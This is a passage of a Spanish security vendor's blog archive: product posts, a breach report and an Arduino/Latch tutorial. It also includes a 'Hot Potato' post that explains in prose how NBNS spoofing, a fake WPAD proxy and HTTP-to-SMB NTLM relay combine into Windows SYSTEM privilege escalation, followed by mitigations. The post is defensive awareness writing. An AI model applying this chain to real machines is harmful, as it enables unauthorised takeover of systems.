múltiples regulaciones, normativas y políticas de una organización, incluida la Ley de Protección de Datos de Carácter Personal. Esta herramienta nos permite un cumplimiento normativo integral ya que es importante tener en cuenta que las normas no son islas sino que están relacionadas. Por ejemplo la ISO 27001 dispone de un dominio que exige el cumplimiento en materia de privacidad y lo mismo sucede con el Esquema Nacional de Seguridad en el ámbito público. Las principales características de SandaS GRC Privacidad son las siguientes: Se adapta a organizaciones de diferentes tamaños, disponiendo de una opción multiorganización que permite la gestión centralizada para grupos de empresas. Permite la inscripción, modificación y supresión de ficheros por vía telemática ante el Registro General de Protección de Datos mediante la integración con el sistema NOTA. Genera y permite la actualización de los Documentos de Seguridad. Permite el control del tratamiento de datos personales por terceros. Contiene los diferentes registros exigidos legalmente: gestión de soportes, gestión de incidencias etc. Integra un módulo de formación on line en materia de protección de datos. Permite llevar un control del estado de cumplimiento de las tareas, la automatización de los Controles Periódicos y las Auditorías internas o externas a realizar. El actual marco europeo de privacidad, que se basa en la Directiva 95/46 pero que se desarrolla en cada estado con regulaciones territoriales, se verá pronto modificado por un Reglamento Europeo de directa aplicación en los estados miembros. El nuevo escenario realiza importantes modificaciones como la eliminación de la inscripción de ficheros. Pone el énfasis en el concepto de tratamiento y continúa manteniendo algunos pilares básicos de la regulación actual de la privacidad (licitud del tratamiento, regulación de relaciones con terceros, derechos de los interesados, principio de seguridad etc.) aunque con algunos cambios. En este sentido y por lo que respecta a la seguridad se presentan novedades. Por citar solo algunas de ellas, merece la pena mencionar el cambio de enfoque de las medidas de seguridad, que no se establecen de forma tasada asociada a un nivel de seguridad de los datos sino que lo serán en función de un análisis de riesgos, las modificaciones relacionadas con las violaciones de seguridad o la figura del Data Protection officer (DPO), por citar sólo algunos de ejemplos. En este nuevo escenario el módulo de Privacidad de SandaS GRC seguirá ayudando en la gestión eficiente de todas estas obligaciones. Para más información: https://sandas.elevenpaths.com www.elevenpaths.com
27 de enero de 2016
Hot Potato. Más que una elevación en Windows, un compendio de fallos bien aprovechados
Hace unos días se ha hecho pública una elevación de privilegios previamente desconocida y con prueba de concepto pública en todos los Windows. Esta es un poco especial, porque consigue elevar privilegios gracias a un compendio de fallos de diseño de Windows bien gestionados, además de "abrir la puerta" un nuevo tipo de ataque. Veamos los detalles y cómo intentar combatirlo. Tres ataques en uno Ocurre cada cierto tiempo. Se publica una prueba de concepto para elevar privilegios sin parche alguno. Un verdadero dolor de cabeza para un administrador de una red si quiere mantenerla bajo control. Sin ser muy estrictos, se nos viene a la cabeza que a final de 2014 ocurrió varias veces seguidas en Windows y una más en agosto de 2015. En el kernel de Linux, de las últimas ocurrió en marzo de 2015. Pero esta es especial, porque en realidad se trata de una combinación de fallos basados en otros históricos conocidos y uno más moderno de los mencionados de 2014. Esta última frase (de https://code.google.com/p/google-security-research/issues/detail?id=222) parece que les dio la idea... NTLM es un protocolo de autenticación inventado por Microsoft que tiene dos versiones. La primera está obsoleta, y sufre del problema de la reflexión o "pass the hash", que ha traído a Microsoft de cabeza desde que se descubrió hace años. Se trata de que alguien intente autenticarse con un equipo del atacante por NTLM, se tome esa información, y se haga pasar por la víctima aunque no se sepa la contraseña. Antes incluso se podía aprovechar para pasarle los hashes a la propia máquina, pero quedó mitigado con el parche MS08-068. Ya no se podían utilizar autenticaciones (desafíos) que estuvieran siendo usadas en ese momento. Esto fue un pequeño golpe para los atacantes, pero el parche nunca evitó los ataques entre protocolos. O sea, que una autenticación viniese de WebDAV a SMB (como hicieron en Google) o de HTTP a SMB, como se ha hecho ahora. Esquema de funcionamiento de Hot Potato Lo interesante de la patata caliente es el uso combinado de fallos que probablemente no sean nunca corregidos o que va a costar que arreglen por estar muy intrincados en Windows o mantenerse por compatibilidad hacia atrás. Se usan tres tipos de ataques. Veamos. Falsificar NBNS Cuando un nombre o dominio no responde por DNS o resolución directa del archivo host, se pregunta al resto de sistemas en la red, través del protocolo NBNS, quién conoce la IP de quien se busca. El ataque hace que se responda siempre a todos los procesos del propio equipo que es él mismo (127.0.0.1) ante cualquier pregunta. Pero no le harán caso si no responde con el mismo ID con el que se le preguntó, así que se responde a todo el mundo, con todos los ID generados por fuerza bruta (solo son 65536 valores). Como va por UDP, es rápido y efectivo. ¿Qué pasa si no se nos pregunta por NBNS porque ya lo soluciona por DNS? En el equipo, se copan todos los puertos UDP. Con ellos se responde a los DNS y si no hay libres, DNS no funcionará... así que se usará NBNS como intento desesperado. Aunque no tenga nada que ver con este ataque concreto, el creador deja la puerta abierta a un ataque NBNS sobre internet (siempre que la víctima tenga el UDP 137 abierto, claro). Un WPAD falso Por otro lado, tenemos otro ataque ya conocido. Windows intenta que le digan automáticamente, qué proxy debe usar. O sea, espera que haya un sistema con nombre "wpad" que resuelva, se conecte, y le dé la configuración (un archivo .dat). Lo hacen incluso servicios esenciales de Windows. Con esa opción marcada, el equipo buscará siempre un WPAD Ahora, usando el ataque NBNS ya descrito, se le dice al equipo que el wpad está en 127.0.0.1. Y se le devuelve .DAT (se le configura el proxy) también con 127.0.0.1. ¿Qué se consigue? Que se convierta la máquina objetivo en su propio proxy local, y por tanto,observar su tráfico. Y además, a todos los usuarios del equipo les aparecerá que el proxy es 127.0.0.1. El ataque, abriendo proxies locales para todos los procesos Llevando la autenticación NTLM de HTTP a SMB Esta es la parte que supone una novedad (aunque se tomara la idea de Google). El parche mencionado, MS08-068, corrigió un ataque típico, pero no la raíz del problema. Nadie detuvo el ataque NTLM entre protocolos. Si se capturan credenciales NTLM a través de HTTP y se reenvían a un proceso SMB de la máquina, podremos enviar mensajes que serán ejecutados como SYSTEM porque parecen autenticados. Y aquí está la elevación. El ataque en acción, metiendo a un usuario raso en el grupo de administradores Ahora solo falta esperar que una petición HTTP generada desde un servicio con altos privilegios intente autenticarse por NTLM a algún sitio. Como tenemos un proxy HTTP en el equipo, capturamos las credenciales y se lanzan e inyectamos un comando. Todo se envía al servicio de escucha SMB interno. Ya está, el comando se lanzará con máximos privilegios. ¿Qué servicios generan peticiones HTTP autenticadas con NTLM privilegiados? Windows Update, Windows defender… El ataque aquí varía de versión a versión, pero es bastante fiable. ¿Se podrá corregir? ¿Cómo? ¿Qué tiene que hacer ahora Microsoft? Normalmente, un fallo de elevación de privilegios ocurre en algún punto del sistema por una mala programación (desbordamiento de memoria, pobre configuración…). Arreglando esa parte, se cierra la puerta. Pero este problema es especial, porque arreglarlo implica solucionar tres problemas conocidos desde años y que nunca se erradicaron, además de que la experiencia nos dice que Microsoft es lento con las elevaciones. Lo más probable es que Microsoft se vea obligado a corregir de alguna manera esa posibilidad de usar hashes NTLM (con desafíos en uso) que van de protocolo a protocolo. Corrigió el problema "canónico" de pass the hash evitando esto de servidor SMB al propio servidor SMB, pero ahora le toca a otros protocolos. Un dato: El parche se emitió en 2008 y el problema se conocía desde 2000. Había formas de mitigarlo, pero el ataque existió 8 años. ¿Tardará ahora tanto? Otro dato: Las elevaciones de privilegios mencionadas al principio del artículo y sacadas a la luz por Google, fueron comunicadas en público porque Microsoft no las corrigió en el plazo de 90 días de cortesía que se les concede. En cualquier caso, parece que si cierra alguna de estas puertas, habrá otras formas de abrirlas combinando otros métodos en un futuro próximo. ¿Qué tiene que hacer el administrador? No puede quedarse esperando el parche. Como cualquier fallo puede (y debe) atacar el problema desde varios frentes. Aquí ofrecemos algunas pistas. Aviso: hay mucho por hacer, y si no se tenían los deberes hechos, puede ser problemático: Para el ataque NBNS: Identificar paquetes mal formados o "floods" de este tipo en la red. Existen programas específicos, y además los IDS deberían detectarlos. Disponer de registros DNS para todos los nombres y evitar la resolución NetBIOS. En especial para WPAD o WPAD.dominio. Contra el ataque WPAD, evitar que Windows busque este archivo. Detener el servicio "Servicio de detección automática de proxy web WinHTTP" en los equipos y evitar que Internet Explorer lo busque. Por si acaso, un truco puede ser incrustar WPAD en el archivo hosts, y ponerlo a cualquier valor. Forzar el uso de NTLMv2 Contra la autenticación NTLM. Forzar el uso de Kerberos y NTLMv2 (si se disponen de equipos medianamente modernos) y aplicar esta mejora publicada por Microsoft hace tiempo. También, firmar toda comunicación SMB. Opciones de seguridad relacionadas con la firma de comunicaciones SMB Pero son parámetros muy sensibles si se tienen equipos viejos en la red. Se pueden romper cosas. Y en general, usar el cortafuegos saliente para evitar que cualquier programa no conocido acceda a la red. Evitar la ejecución de programas desconocidos por usuarios.... lo de siempre. Por último, destacar que es curioso como esta prueba de concepto no está siendo detectada por los antivirus inmediatamente. Aunque no sirva para nada, suelen detectar rápidamente estos binarios para evitar las primeras embestidas de atacantes que intenten lanzar tal cual el binario. Sergio de los Santos ssantos@11paths.com @ssantosv
19 de enero de 2016
Un vistazo a la nueva interfaz de usuario de Tacyt
Existen una serie de factores que no pueden faltar en toda investigación: el punto de partida, será la incógnita que se quiere despejar; un motor de inferencia, será el conocimiento del investigador en el marco del estudio; información, un gran volumen de información; y una herramienta con la capacidad de digerir esa cantidad de información que simplifique la ya de por sí difícil tarea del investigador, Tacyt. En Tacyt aceptamos el reto de resolver la parte técnica de la investigación cubriendo sus cuestiones más relevantes: Capacidad para detectar la publicación de nuevas aplicaciones en distintas regiones geográficas del market oficial de Android y markets alternativos. Procesamiento en tiempo real para atender a la cantidad de aplicaciones detectadas, extraer la información asociada a estas e indexar su contenido. Motor de búsqueda que permita consultar a los investigadores sobre más de 100 campos de información indexados de los millones de apps. Comparador de aplicaciones para facilitar la identificación de rasgos comunes entre aplicaciones. Sistema de filtros que permite la definición de condiciones para alertar al investigador cuando se detecte una nueva aplicación que cumpla un criterio buscado. El equipo de Eleven Paths presentaba en noviembre su investigación acerca de apps publicadas en Google Play con la capacidad de iniciar un servidor HTTP en dispositivos Android. Puede ser de interés encontrar cómo otras aplicaciones podrían estar exponiendo un servicio similar, y esto con Tacyt es muy sencillo. Construyendo una búsqueda con Tacyt Para los investigadores que se acercan por primera vez a la herramienta, se dispone de un asistente que permite la creación de consultas con las que empezar a acercarse a la información y permitiendo buscar por ejemplo todas aquellas aplicaciones que han sido publicadas desde diciembre de 2015 y que contienen la dirección IP 127.0.0.1 entre los enlaces que se han extraído de ellas: Pero a mayor cantidad de información, mayor necesidad de potencia de consulta. Para esos investigadores avezados que necesitan un mayor grado de precisión, el motor reserva una gramática con la capacidad de reconocer lenguajes donde se pueden combinar el uso de operadores lógicos, precedencia y expresiones regulares. En el ejemplo, también se añaden otras posibilidades de búsqueda para afinar más en la investigación: Una búsqueda con varios parámetros y expresiones regulares (hacer clic para ampliar) Todas estas aplicaciones detectadas comparten como rasgo común el criterio de búsqueda del investigador, pero un análisis más detallado y comparación entre estas posiblemente refleje otra serie de valores comunes entre ellas. Para responder a esta necesidad desde la herramienta del comparador se ofrece un sistema de identificación de coincidencias, conectado con el motor de búsqueda y también con el sistema de filtros para realimentar el resto de procesos de la investigación: Comparativa entre apps La nota final la añade la capacidad de alerta temprana ofrecida a través del concepto de filtros. Un sistema de reglas basado en pesos permite establecer mediante el uso de funciones, parámetros y valores, las condiciones que se deben de cumplir para que una aplicación sea capturada por un filtro. En este último paso, Tacyt ofrece un feed RSS que será actualizado con cada nueva detección realizada por el filtro, manteniendo informado al investigador en tiempo real. Creando un filtro El resultado final es una herramienta que en su conjunto pretende cubrir todas las necesidades que puedan surgir cuando se está llevando a cabo una investigación, pero que por su versatilidad permite cubrir otros casos de uso como control del parque de aplicaciones publicado en diferentes markets, protección de marca mediante la creación de filtros que supervisen la aparición de aplicaciones relacionadas en busca de amenazas, análisis de impacto de fallos de seguridad sobre componentes vulnerables que podrán ser buscados identificando todos los sistemas afectados, e incluso estudios estadísticos de usos de tecnologías.
13 de enero de 2016
Informe: 2015, el año de las fugas de información
Los casi 220 millones de credenciales filtradas en las más de 250 brechas de seguridad durante 2015, reavivan muchos debates e invitan a la reflexión. Entre las reflexiones, sobre qué tipo de contraseñas utilizan los usuarios y cómo las almacenan los servidores. Entre los debates, sobre la importancia de implantar medidas como el doble factor de autenticación. En diciembre de 2013 se produjo una de las mayores brechas de seguridad con la filtración de información personal de más de 70 millones de clientes de la empresa norteamericana Target, incidente que motivó la movilización inmediata de recursos en ciberseguridad por valor de cinco millones de dólares. A partir de ese momento, las empresas son cada vez más conscientes de que necesitan proteger sus activos pero, pesar de ello, e l año 2015 ha estado marcado por una gran cantidad de brechas de seguridad que ha supuesto una amenaza tanto para sus usuarios como para otras empresas. Este marco de inseguridad ha motivado a nuestro experto equipo de analistas a la realización de esta investigación sobre los principales afectados por este tipo de fugas de información. Para realizar este documento se han recuperado todos los incidentes de seguridad hechos públicos en los que se han visto implicados registros de usuarios y que han acontecido entre el 1 de enero y el 30 de noviembre de 2015. Algunos detalles del informe: En el caso de Estados Unidos, el principal sector afectado fue ocio y videojuegos. Israel ha sido el principal país, junto con Estados Unido, que más ataques hacktivistas ha recibido. El 42,6% de las filtraciones que han tenido lugar en 2015 aún contenían contraseñas en claro, pero afortunadamente solo representan el 6,5% del total de las credenciales sustraidas. El 80,32% del total de credenciales recuperadas fueron sustraídas en los 13 incidentes (5,14%) en los que más credenciales se filtraron. Descárgate el informe completo aquí.
12 de enero de 2016
Android aglutina más del 95% de los ataques en entorno móvil
Con una cuota de mercado cercana al 81%, Android es el sistema operativo más común entre los cerca de 2.000 millones de dispositivos móviles existentes en el mundo. Es por esto que las amenazas focalizadas en los dispositivos móviles crecen continuamente: ataques específicos, adware agresivo, aplicaciones maliciosas que se comportan como las legítimas pero que roban información o consumen servicios en segundo plano...Se trata de Apps que en muchas ocasiones permanecen indetectables en los markets el tiempo suficiente para alcanzar grandes rates de descargas afectando a miles de usuarios. Los datos son preocupantes: Android aglutina más del 95 % de los ataques en entorno móvil, el número de troyanos bancarios en apps es 9 veces superior que en 2014, y se ha experimentado una profesionalización de los grupos de cibercriminales que focalizan sus actividades en dispositivos móviles. Si a esto le sumamos que cada día se crean cerca de 5.000 nuevas aplicaciones, detectar nuevos vectores de amenazas móviles de forma ágil no es posible con las herramientas de seguridad tradicionales. Los grupos de cibercriminales presentan una estructuración cuasi-empresarial, desarrollando aplicaciones maliciosas bajo una óptica de coste-beneficio, de forma que, a fin de maximizar sus beneficios, reutilizan código, imágenes, certificados digitales, etc. introduciendo “singularidades”, atributos únicos que identifican a una app o a un desarrollador. De esta forma, este nuevo escenario de amenazas requiere de nuevas herramientas, capaces de explotar la inteligencia proveniente no sólo de las aplicaciones móviles, sino también de los markets, a fin de descubrir esas “singularidades” introducidas por los atacantes. Tacyt, nuestra herramienta de ciberinteligencia para apps maliciosas en Android, proporciona acceso a un histórico de aproximadamente 4 millones de apps publicadas en distintos markets móviles, así como a la información de contexto disponible. Desde su creación, nuestra herramienta ha intervenido en varios casos de notable éxito. Uno de ellos fue cuando las autoridades españolas la utilizaron para correlacionar las personas implicadas en una estafa con aplicaciones de SMS. En otro caso, Tacyt fue clave para encontrar un malware desconocido no detectado por los Antivirus y que, usando nuevas técnicas, consiguió burlar la protección de Google Play. Gracias a esto se identificó una botnet importante llamada Shuabang. Los descubrimientos de Tacyt incluyen también a una familia desconocida de clickers que utiliza una nueva estrategia para perpetrar el fraude, a estafas basadas en apps que llaman a números de tarificación premium o al descubrimiento de nuevas técnicas de adware, como las llamadas "Downloaders en diferido", por citar algunos de ellos. Los atacantes tratarán de mejorar sus técnicas de programación, tratando de evitar los controles y herramientas de seguridad existentes… pero siempre cometerán fallos, detectables a través del concepto de singularidad. Adolfo Hernández adolfo.hernandez@11paths.com
7 de enero de 2016
Implementación de "pestillos virtuales" en proyectos basados en Arduino con Latch
Gracias al esfuerzo de Intel por acercar su arquitectura x86 al mundo del IoT, es posible utilizar el SDK en C oficial de Latch desde el entorno de desarrollo de Arduino, y disponer de pestillos virtuales en nuestros proyectos de forma muy sencilla. Arduino es una popular plataforma de hardware y software abierto ampliamente utilizada en todo tipo de proyectos electrónicos, especialmente en ambientes didácticos, por su sencillez y bajo coste. Actualmente se está librado una batalla en torno a la marca Arduino, que explica claramente Félix Maocho en este artículo. Incorpora un completo entorno de programación (IDE) que utiliza un lenguaje basado en Wiring; en esencia C++, aunque en muchas ocasiones se usa C, ya que la suite de desarrollo Open Source incluye ambos lenguajes dentro de su colección de compiladores. Pese a que Intel no supo adaptar x86 a la era post-PC, y desde 2007 la arquitectura ARM domina ampliamente en tablets y smartphones (llegando incluso a dispositivos embebidos que eran nicho tradicional de MIPS), con la llegada del IoT se produce un acercamiento a la comunidad makers de Arduino, hasta ahora fieles a la arquitectura AVR, pero necesitados de facilidades para conectar sus proyectos a Internet. En 2013 Intel lanza la placa de desarrollo Galileo, basada en la arquitectura x86 (i586) es totalmente compatible, tanto con IDE de Arduino, como con todos módulos complementarios (Shields) al adoptar el mismo pinout que el Arduino UNO R3, convirtiéndose en la primera arquitectura no AVR oficialmente certificada por Arduino. Dotada de un núcleo Linux (Yocto) y conexión Ethernet, su estándar totalmente abierto explota al máximo la fusión entre Linux y Arduino; algo que no sucede con el intento más cercano, el Arduino YÚN, cuyo componente Linux es cerrado y extremadamente limitado al igual que el microcontrolador del lado de Arduino. Después de una mínima revisión Gen2 en 2014, Intel alcanza en 2015 un hito en los sistemas embebidos al integrar conexiones WiFi y Bluetooth en la minúscula placa x86 (i686) Edison, sembrando la semilla del nuevo Arduino 101 basado en x86 que verá la luz en 2016 para sustituir al veterano UNO R3 y revolucionar el ecosistema actual. Para utilizar el SDK en C oficial de Latch desde el IDE de Arduino en una placa Intel Edison, es necesario incorporar al IDE las librerías: OpenSSL (libcrypto) para las operaciones criptográficas y cURL (libcurl) para la conexión HTTPS, junto con sus dependencias: nettle, hogweed, gmp, gnutls, z y cap. Estas librerías y sus archivos de cabecera deben ser copiados desde el sistema Linux Yocto de la placa Intel Edison en la ruta sysroot compiler.toolchain.path del IDE de Arduino; que por ejemplo, en la versión de IDE v1.6.2 será: Linux: /home/test/.arduino15/packages/Intel/tools/core2-32-poky-linux/1.6.2+1.0/i686/sysroots/core2-32-poky-linux/ Mac OS X: /Users/test/Library/Arduino15/packages/Intel/tools/core2-32-poky-linux/1.6.2+1.0/i686/core2-32-poky-linux/ Win 8.1: C:UserstestAppDataRoamingArduino15packagesInteltoolscore2-32-poky-linux1.6.2+1.0/core2-32-poky-linux/ Aprovechando la conexión wifi estos archivos se pueden transferir por SSH con una herramienta como WinSCP o similar desde un sistema Windows, y desde Linux o Mac OS X se puede utilizar una combinación de ssh y tar para preservar los enlaces simbólicos; por ejemplo, situarse en el sysroot compiler.toolchain.path y ejecutar: ssh –C root@ip_edison "tar -c /usr/lib/libcrypto*" | tar –x
ssh -C root@ip_edison "tar -c /usr/lib/libcurl*" | tar –x
ssh -C root@ip_edison "tar -c /usr/lib/libgnutls*" | tar –x
ssh -C root@ip_edison "tar -c /usr/lib/libnettle*" | tar -x
ssh -C root@ip_edison "tar -c /usr/lib/libhogweed*"| tar –x
ssh -C root@ip_edison "tar -c /usr/lib/libhogmp*" | tar –x
ssh -C root@ip_edison "tar -c /lib/libz*" | tar -x
ssh -C root@ip_edison "tar -c /lib/libcap*" | tar -x
ssh -C root@ip_edison "tar -c /lib/libcrypto*"| tar -x
ssh -C root@ip_edison "tar -c /usr/include/openssl"| tar –x
ssh -C root@ip_edison "tar -c /usr/include/curl" | tar –x
Para que estas nuevas librerías sean enlazadas dinámicamente por el linker que invoca por el IDE de Arduino en el proceso de construcción del sketch, es necesario modificar el archivo “platform.txt” que detalla las especificaciones de cada arquitectura, añadiendo al final de la línea recipe.c.combine.pattern los modificadores: -lcrypto -lcurl. Este archivo está ubicado en la carpeta correspondiente del IDE de Arduino; por ejemplo, en la versión de IDE v1.6.2 o superior será: Linux: /home/test/.arduino15/packages/Intel/hardware/i686/1.6.2+1.0/ Mac OS X: /Users/test/Library/Arduino15/packages/Intel/hardware/i686/1.6.2+1.0/ Win 8.1: C:UserstestAppDataRoamingArduino15packagesIntelhardwarei6861.6.2+1.0/ Todos los archivos de configuración son leídos únicamente al iniciar el IDE de Arduino, por lo que hay que cerrarlo y volver a abrirlo para que los cambios tengan efecto. Una vez realizados estos cambios en el IDE de Arduino, ya es posible utilizar las librerías del SDK en C de Latch, que podemos descargarnos desde el repositorio oficial, tal y como se muestra a continuación: Un ejemplo de esta implementación se pudo ver en el pasado Hackathon IoT de Openbank; copatrocinado por ElevenPaths, se impartió un taller demostrativo integrando una hucha física con Latch. En combinación con un conocido lector de huella dactilar para la autenticación biométrica del usuario, se realiza una delegación múltiple de la autorización de la extracción de monedas en terceros usuarios mediante Latch. Pudiendo combinar los diferentes pestillos de modo que tengan que estar todos abiertos (AND), o solo alguno de ellos (OR), para que tras la autenticación, la hucha expulse una cantidad de monedas definida. Toda la configuración se almacena en un archivo JSON de fácil manipulación desde Arduino gracias a la librería aJson de Interacive Matter. Y para una mayor sencillez, la conexión física con el lector y la hucha, explota la capacidad de la placa Intel Edison para crear puertos serie virtuales en Arduino a partir de conversores USB, por lo que todo está conectado con un simple HUB USB, sin necesidad de realizar soldaduras ni ninguna otro conexión eléctrica. El código ejemplo está publicado en el espacio de GitHub https://github.com/latchdevel/latch-moneybox
30 de diciembre de 2015
Tratamiento de metadatos automatizado en Clientes ICAP con Metashield
ICAP Internet Content Adaptation Protocol es un protocolo que permite encapsular contenidos de solicitudes HTTP con fines de filtrado y conversión en modo Petición (Reqmod mode) o modo Respuesta (Respmod mode), orientado a operar entre otros sobre dispositivos compatibles de control de red tipo firewalls, balanceadores, etc. Mediante la utilización de este protocolo ICAP, Metashield propone una solución innovadora y escalable en la protección de los datos sensibles que pueden ir incluidos en los metadatos de los documentos que se entregan a los clientes desde servidores web. Metashield for ICAP unido con un equipo que soporte este protocolo como el Secure Web GW de Blue Coat, interactúan eficientemente en el cumplimiento de este objetivo común: Todo comienza con una solicitud de descarga de un fichero realizada por parte de un cliente en un portal web. Esta solicitud llega al Cliente ICAP que como hemos comentado será un dispositivo de la seguridad de red que recogerá la petición y se la hará llegar al servidor que almacena la informacion (archivo). El servidor localiza y contesta al Cliente ICAP con una copia del archivo. El Cliente ICAP recoge el archivo y lo redirecciona hacia Metashield for ICAP que ejecuta el proceso de tratamiento. El Servidor ICAP devuelve el archivo limpio y es el Cliente ICAP el encargado final de suministrárselo al Cliente. Este sencillo proceso evita la fuga de información, que podría afectar económica y reputacionalmente a la organización o a los usuarios que almacenan, editan o distribuyen estos contenidos. Este modelo, permite una gran flexibilidad ya que es independiente del tipo de servidor Web. Para la instalación de Metashield tan solo es necesario disponer de un equipo con S.O Microsoft® Windows Server 2008 R2 o superior con conexión de red, dotando a la organización de un eficaz sistema de protección contra las fugas de información embebida en los archivos, respetando en todo momento la integridad de los mismos. Si el ecosistema de Metashield lleva incluida la consola será posible la configuración del tratamiento de los metadatos de un modo más personalizado, pudiendo crear perfiles específicos para su posterior aplicación sobre las extensiones o familias de ficheros seleccionados. De esta manera se establece un procedimiento de seguridad adicional en entornos heterogéneos, proporcionando un valor añadido a la capa de seguridad establecida en la organización soportando las extensiones más populares de ficheros y archivos multimedia del mercado. Ilustración 1 – Disposición Response modification para el tratamiento de metadatos con Metashield for ICAP
29 de diciembre de 2015
El Cibercrimen ya es una plaga mundial…¿De verdad crees que estás protegido?
Hoy en día, el exponencial desarrollo e innovación experimentados en el campo de las TICs ha conducido a un nuevo escenario donde las organizaciones son capaces de intercambiar información más eficazmente, estableciendo nuevos modelos de negocio, y en general, disminuyendo sus costes operativos mientras incrementan sus niveles de eficiencia y rentabilidad. Sin embargo, la tecnología ha evolucionado para todos, con lo que los ciberdelincuentes también hacen uso de estas nuevas tecnologías y de técnicas más sofisticadas, llegando a perpetrar ataques coordinados y complejos en cuestión de minutos contra las organizaciones o contra su red de proveedores. Consecuentemente, esto ha dado lugar a una nueva generación de amenazas y delitos cibernéticos que implican mayores riesgos y un mayor impacto potencial para las empresas. De hecho, las últimas cifras indican que el coste del cibercrimen ya representa un 0,8% de la economía mundial, superando incluso al tráfico de drogas y armas. La realidad es que cualquier organización puede ser atacada. Los ciberdelincuentes ya no discriminan por la ubicación de las organizaciones, por su tamaño o dimensión, por el sector de actividad o incluso por cuestiones éticas. De hecho, estudios recientes indican que el 97% de las organizaciones han sido hackeadas o vulneradas en menor o mayor medida, y que el 69% de las amenazas detectadas han sido notificadas por agentes externos, con lo que los medios internos tradicionales ya no son suficientes. Otro claro ejemplo de que las organizaciones no están preparadas para este nuevo escenario es que, según las cifras que arrojan los últimos informes y estudios a nivel global, éstas tardan más de 8 meses de promedio en darse cuenta de que han sido atacadas y llegan a recuperarse totalmente; pudiendo derivar en algunos casos en un impacto crítico para la organización e incluso afectar a su propia supervivencia. Por lo tanto, es obvio que el enfoque tradicional (seguridad del castillo) ya no es suficiente para abordar los riesgos a los que están expuestos las organizaciones hoy en día, sino que es necesario adoptar un enfoque más allá del entorno de la propia organización, focalizado en los riesgos de seguridad que impactan en su negocio, incluida su cadena de suministro. En este sentido, es esencial la implantación de un nuevo modelo de gestión de riesgos que articule adecuadamente capacidades de prevención, detección, análisis, mitigación, respuesta y recuperación. Con el propósito de hacer frente a este nuevo escenario, ElevenPaths cuenta con CyberThreats, cuyo modelo holístico de gestión de riesgos centrado en ciberinteligencia ayuda a prevenir, detectar y responder de forma continua a ciberamenazas que pueden suponer un alto impacto en el modelo de negocio de las organizaciones. A continuación se muestran los principales módulos en los que se estructura CyberThreats: En líneas generales, gracias a nuestro equipo de expertos en Detección de Amenazas y Respuesta a Incidentes y a la orquestación de nuestra propia tecnología y procesos junto con las mejores prácticas del mercado y alianzas estratégicas, las organizaciones pueden contar con un soporte continuo y avanzado durante todo el ciclo de vida de las amenazas que facilita el proceso de toma de decisiones y gestión de riesgos corporativos. El siguiente gráfico sintetiza el modelo de funcionamiento de CyberThreats desde la exploración de múltiples fuentes hasta la entrega de valor al cliente: Para más información, visita la web de CyberThreats o contacta con nosotros. También te puede interesar: New Financial Cyber Threats Report Trend Ransomware Report Telefónica Trend Report: The PoS Malware threat in 2015 Cómo funciona el fraude de los billetes de avión y reserva de hoteles (I) Cómo funciona el fraude de los billetes de avión y reserva de hoteles (y II) Ransomware para Linux… algunas aclaraciones y reflexiones Android malware not only posing as Word documents… but Excel as well "Incident Response Management": Attitudes of European Enterprises" Manuel Muñiz Somoza manuel.muniz@11paths.com
23 de diciembre de 2015
Vamps: Recupera el control de los activos IT de tu organización
¿Sabes si los responsables de sistemas IT de tu empresa conocen todos los activos expuestos a Internet? Aunque lo parezca, no es sencillo. Una empresa con varios equipos, departamentos, necesidades cambiantes, y preocupada por la realización del trabajo diario, a veces no puede detenerse a mirar a su alrededor y pensar, ¿cuántos servidores he montado? ¿cuántos equipos están ahí fuera? ¿se han actualizado todos tras las últimas vulnerabilidades? La estructura informática y de comunicaciones es un medio, no un fin en sí mismo. Para cumplir el objetivo real, se utilizan servidores, conexiones, sistemas y programas, hasta que llega un momento en el que resulta que los administradores no conocen sus propios sistemas, no los controlan realmente. Por qué ocurre No resultará complejo entender por qué se llega a este punto. Algunos ejemplos: Normal 0 21 false false false ES X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-fareast-language:EN-US;} El desarrollo/adquisición de nuevos servicios o aplicaciones y la mejora de los existentes para responder a las necesidades del negocio de forma rápida y eficiente, prácticas habituales en un entorno tan cambiante, pueden ser causas de cambios en la infraestructura tecnológica. Cambios no autorizados en la infraestructura como la instalación de servidores, sistemas operativos o paquetes de software en puertos específicos que no son comunicados inmediatamente a los grupos responsables de la organización por falta de coordinación o compromiso entre los procesos implicados. Shadow IT, añadiendo elementos a la infraestructura que están fuera del control de TI. Generalmente las áreas de negocio de las organizaciones tienen problemas para lanzar servicios a producción en al dilatarse los plazos proporcionados por TI, tomando la decisión de contratar los servicios en una infraestructura paralela externa a la organización. Activos descuidados que no están siendo gestionados o de los que ha olvidado su existencia que no cubren ninguna necesidad del negocio pero, al estar expuestos en Internet, introducen un nuevo vector de ataque a la organización. Los atacantes continuamente buscan servidores obsoletos y versiones de software sin actualizar que puedan ser explotados de forma remota y ganar acceso a la organización, por eso es importante conocer qué elementos (servidores, sistemas operativos, paquetes de software) forman parte de la infraestructura del cliente y en qué estado de actualización se encuentran. Retos IT para una organización distribuida La solución Para dar solución a estos retos, presentamos Vamps, nuestra solución para identificar amenazas de seguridad y posibles métodos de ataque contra los sistemas informáticos de una organización permitiendo gestionar rápidamente su corrección. Además, se emplea también Faast, nuestra tecnología de pentesting persisntente, la cual realiza el descubrimiento de activos vulnerables como si fuera un vídeo, de forma continua, sobre todos los activos digitales de tu empresa que son accesibles desde Internet, para reducir el tiempo en detectar cambios en la infraestructura y brechas de seguridad. Faast, usa las mismas técnicas que realizaría un atacante externo o interno que pretende traspasar la seguridad de la organización, comenzando por un nombre de dominio asociado a la organización se descubre nombres de hosts y de aplicaciones web a través de la búsqueda de URLs en Google o Bing, además de servidores DNS y otros servicios web (archive.org, whois, etc.), sin ninguna limitación previa como un rango de direcciones IP o listados de nombres de servidores, dando como resultado el conjunto de activos y versiones de software de una organización, incluso aquellos activos que se desconocía su existencia. Ejemplo de descubrimiento partiendo desde dominio democyberdac.com Dentro del proceso de descubrimiento, la solución empleada por Vamps determina de forma precisa y fiable los cambios de sistema operativo y paquetes de software instalado en los activos. Para llevarlo a cabo analiza y detecta todos los servicios de red 